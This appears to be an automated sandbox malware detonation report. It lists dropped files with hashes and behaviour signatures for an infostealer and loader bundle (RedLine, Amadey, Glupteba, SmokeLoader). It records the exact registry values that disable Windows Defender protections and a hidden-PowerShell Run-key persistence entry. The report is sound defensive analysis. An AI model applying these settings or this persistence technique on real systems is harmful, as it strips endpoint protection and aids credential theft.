C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 1afff8d5352aecef2ecd47ffa02d7f7d
SHA1 8b115b84efdb3a1b87f750d35822b2609e665bef
SHA256 c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1
SHA512 e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VIHCRIESJTOZR25MB6F5.temp

MD5 eb91b0fbed11cc81d3e8c45326e368f1
SHA1 a43b4d763b98177fae41aaa3aee623e79a367d9b
SHA256 0c5925594806fd4de55bb39979a6253fd9cdfa1a4d9d5c277d8f12cbb7a5d633
SHA512 3e88b51731b1c55bfcc56900cd315c7d2797447336e4140241cf3a0e0544ab8999e55a68a80941495708ae2b2b237089c93f1851d0927681f411ff399d79920e

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll

MD5 a5b509a3fb95cc3c8d89cd39fc2a30fb
SHA1 5aff4266a9c0f2af440f28aa865cebc5ddb9cd5c
SHA256 5f3c80056c7b1104c15d6fee49dac07e665c6ffd0795ad486803641ed619c529
SHA512 3cc58d989c461a04f29acbfe03ed05f970b3b3e97e6819962fc5c853f55bce7f7aba0544a712e3a45ee52ab31943c898f6b3684d755b590e3e961ae5ecd1edb9

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll

MD5 e913b0d252d36f7c9b71268df4f634fb
SHA1 5ac70d8793712bcd8ede477071146bbb42d3f018
SHA256 4cf5b584cf79ac523f645807a65bc153fbeaa564c0e1acb4dac9004fc9d038da
SHA512 3ea08f0897c1b7b5859961351eef59840bbf319a6ad7ebe1c9e1b5e2ce25588d7b1a37fd6c5417653521fc73f1f42eb043d0ee6fcd645aa92b8f305d726273b4

C:\Program Files\Google\Chrome\updater.exe

MD5 bae29e49e8190bfbbf0d77ffab8de59d
SHA1 4a6352bb47c7e1666a60c76f9b17ca4707872bd9
SHA256 f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87
SHA512 9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2

C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error

MD5 fd2727132edd0b59fa33733daa11d9ef
SHA1 63e36198d90c4c2b9b09dd6786b82aba5f03d29a
SHA256 3a72dbedc490773f90e241c8b3b839383a63ce36426a4f330a0f754b14b4d23e
SHA512 3e251be7d0e8db92d50092a4c4be3c74f42f3d564c72981f43a8e0fe06427513bfa0f67821a61a503a4f85741f0b150280389f8f4b4f01cdfd98edce5af29e6e

C:\Users\Admin\AppData\Local\Temp\osloader.exe

MD5 e2f68dc7fbd6e0bf031ca3809a739346
SHA1 9c35494898e65c8a62887f28e04c0359ab6f63f5
SHA256 b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4
SHA512 26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error

MD5 5da3a881ef991e8010deed799f1a5aaf
SHA1 fea1acea7ed96d7c9788783781e90a2ea48c1a53
SHA256 f18fdb9e03546bfb98397bcb8378b505eaf4ac061749229a7ee92a1c3cf156e4
SHA512 24fbcb5353a3d51ee01f1de1bbb965f9e40e0d00e52c42713d446f12edceeb8d08b086a8687a6188decaa8f256899e24a06c424d8d73adaad910149a9c45ef09

Analysis: behavioral2

Detonation Overview

Submitted

2023-10-19 13:03

Reported

2023-10-19 13:05

Platform

win10v2004-20230915-en

Max time kernel

101s

Max time network

153s

Command Line

"C:\Users\Admin\AppData\Local\Temp\file.exe"

Signatures

Amadey

trojan amadey

DcRat

rat infostealer dcrat
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\file.exe N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1fX89KT6.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\A5C5.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1fX89KT6.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1fX89KT6.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1fX89KT6.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1fX89KT6.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1fX89KT6.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\A5C5.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\A5C5.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\A5C5.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\A5C5.exe N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

.NET Reactor proctector

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\A6FE.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\9D.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\VH4vX77.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ro8sA21.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\DO2BB55.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TK1xO34.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1fX89KT6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Pm6119.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3qu90Pt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4HS096BX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9F58.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\AH0ga1vM.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\A0FF.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\qS9tw1uX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\sC2xv8pP.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\A46C.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\hd8Im5XM.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\A5C5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\1AP90VT0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\A6FE.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\A98F.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\2ki127Ll.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AAB9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AEB2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B952.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9D.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4F3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5DE.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B1F.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Uses the VBS compiler for execution

Windows security modification

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1fX89KT6.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1fX89KT6.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\A5C5.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\5DE.exe'\"" C:\Users\Admin\AppData\Local\Temp\5DE.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\file.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ro8sA21.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TK1xO34.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup6 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP006.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\sC2xv8pP.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup7 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP007.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\hd8Im5XM.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\VH4vX77.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\DO2BB55.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\9F58.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\AH0ga1vM.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup5 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP005.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\qS9tw1uX.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Detected potential entity reuse from brand microsoft.

phishing microsoft

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4472 set thread context of 1876 N/A C:\Users\Admin\AppData\Local\Temp\B952.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 5372 set thread context of 5864 N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3qu90Pt.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3qu90Pt.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3qu90Pt.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-751 = "Tonga Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-11 = "Azores Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2432 = "Cuba Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-331 = "E. Europe Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1891 = "Russia TZ 3 Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2182 = "Astrakhan Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-385 = "Namibia Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-241 = "Samoa Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1972 = "Belarus Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-682 = "E. Australia Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-602 = "Taipei Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1501 = "Turkey Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2372 = "Easter Island Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-351 = "FLE Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-232 = "Hawaiian Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2431 = "Cuba Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2942 = "Sao Tome Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-448 = "Azerbaijan Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1841 = "Russia TZ 4 Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-384 = "Namibia Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2141 = "Transbaikal Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-161 = "Central Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2791 = "Novosibirsk Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-842 = "Argentina Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-231 = "Hawaiian Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-411 = "E. Africa Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2511 = "Lord Howe Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
